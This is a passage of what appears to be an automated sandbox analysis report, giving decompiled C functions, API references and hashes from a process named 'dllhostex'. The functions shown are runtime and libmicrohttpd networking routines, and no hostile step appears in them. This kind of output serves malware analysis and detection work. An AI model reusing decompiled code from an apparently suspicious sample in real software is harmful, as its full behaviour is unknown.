                                                • API String ID: 269201875-0
                                                • Opcode ID: 5d2e645ad0f4b0b9f05e56246cd0ff0457d105eb0295b91751e18cdebab80b9a
                                                • Instruction ID: b331eeb9553264a8f91c1f7de027d25acd7321104e2310af56e8c8d576bb945d
                                                • Opcode Fuzzy Hash: 5d2e645ad0f4b0b9f05e56246cd0ff0457d105eb0295b91751e18cdebab80b9a
                                                • Instruction Fuzzy Hash: 4B41D172E002049FDB24DF7CC980A5DB7BAFF85718F1585A8D519EB389DA31A901CB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0136E308(intOrPtr* _a4) {
                                                				intOrPtr _t6;
                                                				intOrPtr* _t21;
                                                				void* _t23;
                                                				void* _t24;
                                                				void* _t25;
                                                				void* _t26;
                                                				void* _t27;
                                                
                                                				_t21 = _a4;
                                                				if(_t21 != 0) {
                                                					_t23 =  *_t21 -  *0x13cc300; // 0x13cc354
                                                					if(_t23 != 0) {
                                                						E013656E2(_t7);
                                                					}
                                                					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x13cc304; // 0x13d50fc
                                                					if(_t24 != 0) {
                                                						E013656E2(_t8);
                                                					}
                                                					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x13cc308; // 0x13d50fc
                                                					if(_t25 != 0) {
                                                						E013656E2(_t9);
                                                					}
                                                					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x13cc330; // 0x13cc358
                                                					if(_t26 != 0) {
                                                						E013656E2(_t10);
                                                					}
                                                					_t6 =  *((intOrPtr*)(_t21 + 0x34));
                                                					_t27 = _t6 -  *0x13cc334; // 0x13d5100
                                                					if(_t27 != 0) {
                                                						return E013656E2(_t6);
                                                					}
                                                				}
                                                				return _t6;
                                                			}

                                                APIs
                                                • _free.LIBCMT ref: 0136E320
                                                  • Part of subcall function 013656E2: HeapFree.KERNEL32(00000000,00000000,?,01363C72), ref: 013656F8
                                                  • Part of subcall function 013656E2: GetLastError.KERNEL32(?,?,01363C72), ref: 0136570A
                                                • _free.LIBCMT ref: 0136E332
                                                • _free.LIBCMT ref: 0136E344
                                                • _free.LIBCMT ref: 0136E356
                                                • _free.LIBCMT ref: 0136E368
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 75cb491accdde86cc4006e7fc5d3c718474ba4aeafd0c64d9c70ee73918df496
                                                • Instruction ID: 1afd86d5104fe809be30edf9291d2c217e92889030928a22e22a105931ca4bea
                                                • Opcode Fuzzy Hash: 75cb491accdde86cc4006e7fc5d3c718474ba4aeafd0c64d9c70ee73918df496
                                                • Instruction Fuzzy Hash: 96F0FF33545601ABD630EB6DF9C1C1A7BDEAB10768B789829F148D7548CB24FD848764
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • WSAPoll.WS2_32(?,00000000,00000001), ref: 0134BD78
                                                • WSAGetLastError.WS2_32 ref: 0134BD82
                                                • recv.WS2_32(?,?,00000004,00000000), ref: 0134BDDF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLastPollrecv
                                                • String ID: poll failed: %s
                                                • API String ID: 4048060239-636620642
                                                • Opcode ID: c8a01a2a743c1ceb126b957c919f94fcfa2cd75737a4b40ec1d283215211862f
                                                • Instruction ID: cff507931fae3e5ed5d311ed33f9b504b0eb63d0597e8911f50a320fe6b8623b
                                                • Opcode Fuzzy Hash: c8a01a2a743c1ceb126b957c919f94fcfa2cd75737a4b40ec1d283215211862f
                                                • Instruction Fuzzy Hash: F13108316007455BF320AF2C98947AABBD4EB8132CF540A6DEAE6C21D5E734E5898762
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 58%
                                                			E0134FF60(void* __ecx, intOrPtr __edx) {
                                                				intOrPtr _t8;
                                                				intOrPtr _t9;
                                                				void* _t11;
                                                				void* _t12;
                                                				void* _t16;
                                                				intOrPtr _t21;
                                                				char* _t22;
                                                				intOrPtr* _t23;
                                                
                                                				_t21 = __edx;
                                                				_t16 = __ecx;
                                                				_t22 = E013551C0(__edx, 0x3a);
                                                				_t8 =  *((intOrPtr*)(_t16 + 0x10));
                                                				if(_t22 != 0) {
                                                					if( *((intOrPtr*)(_t8 + 0xec)) > 0xffffffff) {
                                                						L8:
                                                						 *_t22 = 0;
                                                						_t23 = _t22 + 1;
                                                						_t9 =  *_t23;
                                                						if(_t9 != 0) {
                                                							while(_t9 == 0x20 || _t9 == 9) {
                                                								_t9 =  *((intOrPtr*)(_t23 + 1));
                                                								_t23 = _t23 + 1;
                                                								if(_t9 != 0) {
                                                									continue;
                                                								}
                                                								goto L12;
                                                							}
                                                						}
                                                						L12:
                                                						 *((intOrPtr*)(_t16 + 0x44)) = _t21;
                                                						 *((intOrPtr*)(_t16 + 0x48)) = _t23;
                                                						return 1;
                                                					} else {
                                                						_t11 = E013551C0(_t21, 0x20);
                                                						if(_t11 == 0 || _t11 >= _t22) {
                                                							_t12 = E013551C0(_t21, 9);
                                                							if(_t12 == 0 || _t12 >= _t22) {
                                                								goto L8;
                                                							} else {
                                                								goto L2;
                                                							}
                                                						} else {
                                                							goto L2;
                                                						}
                                                					}
                                                				} else {
                                                					_push("Received malformed line (no colon). Closing connection.\n");
                                                					_push(_t8);
                                                					E01351E90();
                                                					_t2 = _t22 + 1; // 0x1
                                                					E0134DD20(_t16, _t2);
                                                					L2:
                                                					return 0;
                                                				}
                                                			}

                                                APIs
                                                • ___from_strstr_to_strchr.LIBCMT ref: 0134FF6A
                                                • ___from_strstr_to_strchr.LIBCMT ref: 0134FFA5
                                                • ___from_strstr_to_strchr.LIBCMT ref: 0134FFB8
                                                  • Part of subcall function 0134DD20: shutdown.WS2_32(?,00000001), ref: 0134DD56
                                                Strings
                                                • Received malformed line (no colon). Closing connection., xrefs: 0134FF7B
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ___from_strstr_to_strchr$shutdown
                                                • String ID: Received malformed line (no colon). Closing connection.
                                                • API String ID: 899474339-3301224655
                                                • Opcode ID: 3638054064c09008f2e54a51a2e7a3c020f4b1a288bed102ee4e1342e58717d1
                                                • Instruction ID: 0c84185c53aaf66265713a301c654d22295c06d8756b5a04d713a9670a97f3a5
                                                • Opcode Fuzzy Hash: 3638054064c09008f2e54a51a2e7a3c020f4b1a288bed102ee4e1342e58717d1
                                                • Instruction Fuzzy Hash: DC01D621A003110BEF32596C5C81F6D6BDD9F63B6EF1C086AED94DA282F251B44A86E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 33%
                                                			E0134DB50(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
                                                				intOrPtr _v0;
                                                				char _v4;
                                                				char _v8;
                                                				intOrPtr _t30;
                                                				intOrPtr* _t35;
                                                				signed int _t38;
                                                				signed int _t41;
                                                				intOrPtr _t45;
                                                				void* _t49;
                                                				intOrPtr* _t50;
                                                				intOrPtr* _t53;
                                                				intOrPtr _t56;
                                                				void* _t57;
                                                				intOrPtr _t59;
                                                				void* _t64;
                                                
                                                				_t56 = __edx;
                                                				_t49 = __ecx;
                                                				_push(__ecx);
                                                				_v4 = 1;
                                                				if(__ecx == 0) {
                                                					_push("NULL != connection");
                                                					_push(0x234);
                                                					E012938B0(__ecx, E0135B8FA(2), "%s:%u Assertion failed: %s\nProgram aborted.\n", "c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\connection.c");
                                                					E0135D32E(_t49, E0135B8FA(2));
                                                					E0135EBB9(__ebx, _t49, _t56, __edi, __esi);
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					_push(_t49);
                                                					_v8 = 0;
                                                					if(_t49 == 0) {
                                                						_push("NULL != connection");
                                                						_push(0x286);
                                                						E012938B0(_t49, E0135B8FA(2), "%s:%u Assertion failed: %s\nProgram aborted.\n", "c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\connection.c");
                                                						E0135D32E(_t49, E0135B8FA(2));
                                                						E0135EBB9(__ebx, _t49, _t56, __edi, __esi);
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						_push(__ebx);
                                                						_push(__esi);
                                                						_t64 = _t49;
                                                						_t45 = _t56;
                                                						_push(__edi);
                                                						_t50 =  *((intOrPtr*)(_t64 + 0x20));
                                                						_t30 =  *((intOrPtr*)(_t50 + 8));
                                                						_t59 =  *((intOrPtr*)(_t50 + 0xc));
                                                						_t57 = _t30 + 0x10;
                                                						if(_t57 > _t59 || _t57 < _t30) {
                                                							L12:
                                                							return 0;
                                                						} else {
                                                							 *((intOrPtr*)(_t50 + 0xc)) = _t59 - 0x10;
                                                							_t53 =  *_t50 + 0xfffffff0 + _t59;
                                                							if(_t53 == 0) {
                                                								goto L12;
                                                							} else {
                                                								 *((intOrPtr*)(_t53 + 4)) = _v4;
                                                								 *((intOrPtr*)(_t53 + 8)) = _v0;
                                                								 *((intOrPtr*)(_t53 + 0xc)) = _t45;
                                                								 *_t53 = 0;
                                                								_t35 =  *((intOrPtr*)(_t64 + 0x18));
                                                								if(_t35 != 0) {
                                                									 *_t35 = _t53;
                                                									 *((intOrPtr*)(_t64 + 0x18)) = _t53;
                                                									return 1;
                                                								} else {
                                                									 *((intOrPtr*)(_t64 + 0x14)) = _t53;
                                                									 *((intOrPtr*)(_t64 + 0x18)) = _t53;
                                                									return 1;
                                                								}
                                                							}
                                                						}
                                                					} else {
                                                						_t38 =  &_v8;
                                                						__imp__#21( *((intOrPtr*)(_t49 + 0xa0)), 6, 1, _t38, 4);
                                                						asm("sbb eax, eax");
                                                						return  ~_t38 + 1;
                                                					}
                                                				} else {
                                                					_t41 =  &_v4;
                                                					__imp__#21( *((intOrPtr*)(__ecx + 0xa0)), 6, 1, _t41, 4);
                                                					asm("sbb eax, eax");
                                                					return  ~_t41 + 1;
                                                				}
                                                			}



















                                                APIs
                                                • setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 0134DB6D
                                                Strings
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\connection.c, xrefs: 0134DB84
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134DB89
                                                • NULL != connection, xrefs: 0134DB7A
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: setsockopt
                                                • String ID: %s:%u Assertion failed: %sProgram aborted.$NULL != connection$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\connection.c
                                                • API String ID: 3981526788-467287981
                                                • Opcode ID: 8d8078255a3de16593d962ab675f8f96149fe22dce23e2ddb23ad08fbb363707
                                                • Instruction ID: 353a29b74dcbfd1307b8123c6f2032f9a9582cf2d4e5add0506e0d86a3e33d2e
                                                • Opcode Fuzzy Hash: 8d8078255a3de16593d962ab675f8f96149fe22dce23e2ddb23ad08fbb363707
                                                • Instruction Fuzzy Hash: 4CF0E5F2BD43023AFA1436796C07F27756D9B20F0DF04087CFA0BA42C5E6B291184123
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 43%
                                                			E0134DBC0(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                				intOrPtr _v0;
                                                				char _v4;
                                                				intOrPtr _t23;
                                                				intOrPtr* _t28;
                                                				signed int _t31;
                                                				intOrPtr _t35;
                                                				void* _t39;
                                                				intOrPtr* _t40;
                                                				intOrPtr* _t43;
                                                				intOrPtr _t45;
                                                				void* _t46;
                                                				intOrPtr _t48;
                                                				void* _t53;
                                                
                                                				_t45 = __edx;
                                                				_t39 = __ecx;
                                                				_push(__ecx);
                                                				_v4 = 0;
                                                				if(__ecx == 0) {
                                                					_push("NULL != connection");
                                                					_push(0x286);
                                                					E012938B0(__ecx, E0135B8FA(2), "%s:%u Assertion failed: %s\nProgram aborted.\n", "c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\connection.c");
                                                					E0135D32E(_t39, E0135B8FA(2));
                                                					E0135EBB9(__ebx, _t39, _t45, __edi, __esi);
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					_push(__ebx);
                                                					_push(__esi);
                                                					_t53 = _t39;
                                                					_t35 = _t45;
                                                					_push(__edi);
                                                					_t40 =  *((intOrPtr*)(_t53 + 0x20));
                                                					_t23 =  *((intOrPtr*)(_t40 + 8));
                                                					_t48 =  *((intOrPtr*)(_t40 + 0xc));
                                                					_t46 = _t23 + 0x10;
                                                					if(_t46 > _t48 || _t46 < _t23) {
                                                						L9:
                                                						return 0;
                                                					} else {
                                                						 *((intOrPtr*)(_t40 + 0xc)) = _t48 - 0x10;
                                                						_t43 =  *_t40 + 0xfffffff0 + _t48;
                                                						if(_t43 == 0) {
                                                							goto L9;
                                                						} else {
                                                							 *((intOrPtr*)(_t43 + 4)) = _v0;
                                                							 *((intOrPtr*)(_t43 + 8)) = _a4;
                                                							 *((intOrPtr*)(_t43 + 0xc)) = _t35;
                                                							 *_t43 = 0;
                                                							_t28 =  *((intOrPtr*)(_t53 + 0x18));
                                                							if(_t28 != 0) {
                                                								 *_t28 = _t43;
                                                								 *((intOrPtr*)(_t53 + 0x18)) = _t43;
                                                								return 1;
                                                							} else {
                                                								 *((intOrPtr*)(_t53 + 0x14)) = _t43;
                                                								 *((intOrPtr*)(_t53 + 0x18)) = _t43;
                                                								return 1;
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					_t31 =  &_v4;
                                                					__imp__#21( *((intOrPtr*)(__ecx + 0xa0)), 6, 1, _t31, 4);
                                                					asm("sbb eax, eax");
                                                					return  ~_t31 + 1;
                                                				}
                                                			}

















                                                APIs
                                                • setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 0134DBDD
                                                Strings
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\connection.c, xrefs: 0134DBF4
                                                • NULL != connection, xrefs: 0134DBEA
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134DBF9
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: setsockopt
                                                • String ID: %s:%u Assertion failed: %sProgram aborted.$NULL != connection$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\connection.c
                                                • API String ID: 3981526788-467287981
                                                • Opcode ID: 2a8da69ea243c654a80544d4e6707ba0a4a7c95e23edebb9e6cc88db22b94f0e
                                                • Instruction ID: 862fbe7e9427be0459c6bce51f08e0b169dba14ea1a6a227491a999de21f70f1
                                                • Opcode Fuzzy Hash: 2a8da69ea243c654a80544d4e6707ba0a4a7c95e23edebb9e6cc88db22b94f0e
                                                • Instruction Fuzzy Hash: F8F065F2F993013AF6183679AC0BF67655D5F20F0DF1409BCFA4BA51C5E6A1A1184163
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 78%
                                                			E01366022(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
                                                				signed int _v5;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				unsigned int _v24;
                                                				signed int _v32;
                                                				signed int _v40;
                                                				char _v48;
                                                				intOrPtr _v56;
                                                				char _v60;
                                                				void* __ebx;
                                                				void* __edi;
                                                				signed char _t84;
                                                				void* _t90;
                                                				signed int _t94;
                                                				signed int _t96;
                                                				signed int _t97;
                                                				signed int _t98;
                                                				signed int _t103;
                                                				signed int _t104;
                                                				void* _t105;
                                                				signed int _t106;
                                                				void* _t107;
                                                				void* _t109;
                                                				void* _t112;
                                                				void* _t114;
                                                				void* _t118;
                                                				char* _t119;
                                                				signed short _t122;
                                                				void* _t123;
                                                				signed int _t124;
                                                				signed short _t127;
                                                				signed int _t132;
                                                				signed int* _t133;
                                                				signed int* _t136;
                                                				signed int _t137;
                                                				signed int _t141;
                                                				signed int _t143;
                                                				signed int _t148;
                                                				signed int _t149;
                                                				signed int _t153;
                                                				signed short _t159;
                                                				unsigned int _t160;
                                                				signed int _t167;
                                                				void* _t168;
                                                				signed int _t169;
                                                				signed int* _t170;
                                                				signed int _t173;
                                                				signed int _t181;
                                                				signed int _t182;
                                                				signed int _t183;
                                                				signed int _t185;
                                                				signed int _t186;
                                                				signed int _t187;
                                                
                                                				_t168 = __edx;
                                                				_t181 = _a24;
                                                				if(_t181 < 0) {
                                                					_t181 = 0;
                                                				}
                                                				_t185 = _a8;
                                                				 *_t185 = 0;
                                                				E01359186( &_v60, _t168, _a36);
                                                				_t5 = _t181 + 0xb; // 0xb
                                                				if(_a12 > _t5) {
                                                					_t136 = _a4;
                                                					_t141 = _t136[1];
                                                					_t169 =  *_t136;
                                                					__eflags = (_t141 >> 0x00000014 & 0x000007ff) - 0x7ff;
                                                					if((_t141 >> 0x00000014 & 0x000007ff) != 0x7ff) {
                                                						__eflags = _t141;
                                                						if(__eflags > 0) {
                                                							L14:
                                                							_t170 = _t185 + 1;
                                                							_t84 = _a28 ^ 0x00000001;
                                                							_v20 = 0x3ff;
                                                							_v5 = _t84;
                                                							_v40 = _t170;
                                                							_v32 = ((_t84 & 0x000000ff) << 5) + 7;
                                                							__eflags = _t141 & 0x7ff00000;
                                                							_t90 = 0x30;
                                                							if((_t141 & 0x7ff00000) != 0) {
                                                								 *_t185 = 0x31;
                                                								L19:
                                                								_t143 = 0;
                                                								__eflags = 0;
                                                								L20:
                                                								_t186 =  &(_t170[0]);
                                                								_v16 = _t186;
                                                								__eflags = _t181;
                                                								if(_t181 != 0) {
                                                									_t94 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v56 + 0x88))))));
                                                								} else {
                                                									_t94 = _t143;
                                                								}
                                                								 *_t170 = _t94;
                                                								_t96 = _t136[1] & 0x000fffff;
                                                								__eflags = _t96;
                                                								_v24 = _t96;
                                                								if(_t96 > 0) {
                                                									L25:
                                                									_t171 = _t143;
                                                									_t144 = 0xf0000;
                                                									_t97 = 0x30;
                                                									_v12 = _t97;
                                                									_v16 = _t143;
                                                									_v24 = 0xf0000;
                                                									do {
                                                										__eflags = _t181;
                                                										if(_t181 <= 0) {
                                                											break;
                                                										}
                                                										_t122 = E01374310( *_t136 & _t171, _v12, _t136[1] & _t144 & 0x000fffff);
                                                										_t123 = 0x30;
                                                										_t159 = (_t122 & 0x0000ffff) + _t123;
                                                										_t124 = _t159 & 0x0000ffff;
                                                										__eflags = _t159 - 0x39;
                                                										if(_t159 > 0x39) {
                                                											_t127 = _v32 + _t159;
                                                											__eflags = _t127;
                                                											_t124 = _t127 & 0x0000ffff;
                                                										}
                                                										_t160 = _v24;
                                                										_t171 = (_t160 << 0x00000020 | _v16) >> 4;
                                                										 *_t186 = _t124;
                                                										_t186 = _t186 + 1;
                                                										_t144 = _t160 >> 4;
                                                										_t97 = _v12 - 4;
                                                										_t181 = _t181 - 1;
                                                										_v16 = (_t160 << 0x00000020 | _v16) >> 4;
                                                										_v24 = _t160 >> 4;
                                                										_v12 = _t97;
                                                										__eflags = _t97;
                                                									} while (_t97 >= 0);
                                                									_v16 = _t186;
                                                									__eflags = _t97;
                                                									if(_t97 < 0) {
                                                										goto L41;
                                                									}
                                                									_t118 = E01374310( *_t136 & _t171, _v12, _t136[1] & _t144 & 0x000fffff);
                                                									__eflags = _t118 - 8;
                                                									if(_t118 <= 8) {
                                                										goto L41;
                                                									}
                                                									_t119 = _t186 - 1;
                                                									while(1) {
                                                										_t153 =  *_t119;
                                                										__eflags = _t153 - 0x66;
                                                										if(_t153 == 0x66) {
                                                											goto L35;
                                                										}
                                                										__eflags = _t153 - 0x46;
                                                										if(_t153 != 0x46) {
                                                											__eflags = _t119 - _v40;
                                                											if(_t119 == _v40) {
                                                												_t53 = _t119 - 1;
                                                												 *_t53 =  *(_t119 - 1) + 1;
                                                												__eflags =  *_t53;
                                                											} else {
                                                												__eflags = _t153 - 0x39;
                                                												if(_t153 == 0x39) {
                                                													_t153 = _v32 + 0x39;
                                                													__eflags = _t153;
                                                												}
                                                												 *_t119 = _t153 + 1;
                                                											}
                                                											goto L41;
                                                										}
                                                										L35:
                                                										 *_t119 = 0x30;
                                                										_t119 = _t119 - 1;
                                                									}
                                                								} else {
                                                									__eflags =  *_t136 - _t143;
                                                									if( *_t136 <= _t143) {
                                                										L41:
                                                										__eflags = _t181;
                                                										if(_t181 > 0) {
                                                											_push(_t181);
                                                											_t114 = 0x30;
                                                											_push(_t114);
                                                											_push(_t186);
                                                											E01356150(_t181);
                                                											_t186 = _t186 + _t181;
                                                											__eflags = _t186;
                                                											_v16 = _t186;
                                                										}
                                                										_t98 = _v40;
                                                										__eflags =  *_t98;
                                                										if( *_t98 == 0) {
                                                											_t186 = _t98;
                                                											_v16 = _t186;
                                                										}
                                                										 *_t186 = (_v5 << 5) + 0x50;
                                                										_t103 = E01374310( *_t136, 0x34, _t136[1]);
                                                										_t187 = 0;
                                                										_t104 = _v16;
                                                										_t148 = (_t103 & 0x000007ff) - _v20;
                                                										__eflags = _t148;
                                                										asm("sbb esi, esi");
                                                										_t173 = _t104 + 2;
                                                										_v40 = _t173;
                                                										if(__eflags < 0) {
                                                											L49:
                                                											_t148 =  ~_t148;
                                                											asm("adc esi, 0x0");
                                                											_t187 =  ~_t187;
                                                											_t137 = 0x2d;
                                                											goto L50;
                                                										} else {
                                                											if(__eflags > 0) {
                                                												L48:
                                                												_t137 = 0x2b;
                                                												L50:
                                                												 *(_t104 + 1) = _t137;
                                                												_t182 = _t173;
                                                												_t105 = 0x30;
                                                												 *_t173 = _t105;
                                                												_t106 = 0;
                                                												__eflags = _t187;
                                                												if(__eflags < 0) {
                                                													L54:
                                                													__eflags = _t182 - _t173;
                                                													if(_t182 != _t173) {
                                                														L58:
                                                														_push(_t137);
                                                														_push(_t106);
                                                														_push(0x64);
                                                														_push(_t187);
                                                														_t107 = E01374040();
                                                														_t187 = _t137;
                                                														_t137 = _t148;
                                                														_v32 = _t173;
                                                														_t173 = _v40;
                                                														 *_t182 = _t107 + 0x30;
                                                														_t182 = _t182 + 1;
                                                														_t106 = 0;
                                                														__eflags = 0;
                                                														L59:
                                                														__eflags = _t182 - _t173;
                                                														if(_t182 != _t173) {
                                                															L63:
                                                															_push(_t137);
                                                															_push(_t106);
                                                															_push(0xa);
                                                															_push(_t187);
                                                															_push(_t148);
                                                															_t109 = E01374040();
                                                															_v40 = _t173;
                                                															 *_t182 = _t109 + 0x30;
                                                															_t182 = _t182 + 1;
                                                															_t106 = 0;
                                                															__eflags = 0;
                                                															L64:
                                                															_t149 = _t148 + 0x30;
                                                															__eflags = _t149;
                                                															 *_t182 = _t149;
                                                															 *(_t182 + 1) = _t106;
                                                															_t183 = _t106;
                                                															L65:
                                                															if(_v48 != 0) {
                                                																 *(_v60 + 0x350) =  *(_v60 + 0x350) & 0xfffffffd;
                                                															}
                                                															return _t183;
                                                														}
                                                														__eflags = _t187 - _t106;
                                                														if(__eflags < 0) {
                                                															goto L64;
                                                														}
                                                														if(__eflags > 0) {
                                                															goto L63;
                                                														}
                                                														__eflags = _t148 - 0xa;
                                                														if(_t148 < 0xa) {
                                                															goto L64;
                                                														}
                                                														goto L63;
                                                													}
                                                													__eflags = _t187 - _t106;
                                                													if(__eflags < 0) {
                                                														goto L59;
                                                													}
                                                													if(__eflags > 0) {
                                                														goto L58;
                                                													}
                                                													__eflags = _t148 - 0x64;
                                                													if(_t148 < 0x64) {
                                                														goto L59;
                                                													}
                                                													goto L58;
                                                												}
                                                												_t137 = 0x3e8;
                                                												if(__eflags > 0) {
                                                													L53:
                                                													_push(_t137);
                                                													_push(_t106);
                                                													_push(_t137);
                                                													_push(_t187);
                                                													_t112 = E01374040();
                                                													_t187 = _t137;
                                                													_t137 = _t148;
                                                													_v32 = _t173;
                                                													_t173 = _v40;
                                                													 *_t173 = _t112 + 0x30;
                                                													_t182 = _t173 + 1;
                                                													_t106 = 0;
                                                													__eflags = 0;
                                                													goto L54;
                                                												}
                                                												__eflags = _t148 - 0x3e8;
                                                												if(_t148 < 0x3e8) {
                                                													goto L54;
                                                												}
                                                												goto L53;
                                                											}
                                                											__eflags = _t148;
                                                											if(_t148 < 0) {
                                                												goto L49;
                                                											}
                                                											goto L48;
                                                										}
                                                									}
                                                									goto L25;
                                                								}
                                                							}
                                                							 *_t185 = _t90;
                                                							_t143 =  *_t136 | _t136[1] & 0x000fffff;
                                                							__eflags = _t143;
                                                							if(_t143 != 0) {
                                                								_v20 = 0x3fe;
                                                								goto L19;
                                                							}
                                                							_v20 = _t143;
                                                							goto L20;
                                                						}
                                                						if(__eflags < 0) {
                                                							L13:
                                                							 *_t185 = 0x2d;
                                                							_t185 = _t185 + 1;
                                                							__eflags = _t185;
                                                							_t141 = _t136[1];
                                                							goto L14;
                                                						}
                                                						__eflags = _t169;
                                                						if(_t169 >= 0) {
                                                							goto L14;
                                                						}
                                                						goto L13;
                                                					}
                                                					_t183 = E0136633C(_t136, _t141, _t136, _t185, _a12, _a16, _a20, _t181, 0, _a32, 0);
                                                					__eflags = _t183;
                                                					if(_t183 == 0) {
                                                						_t132 = E01354E10(_t185, 0x65);
                                                						__eflags = _t132;
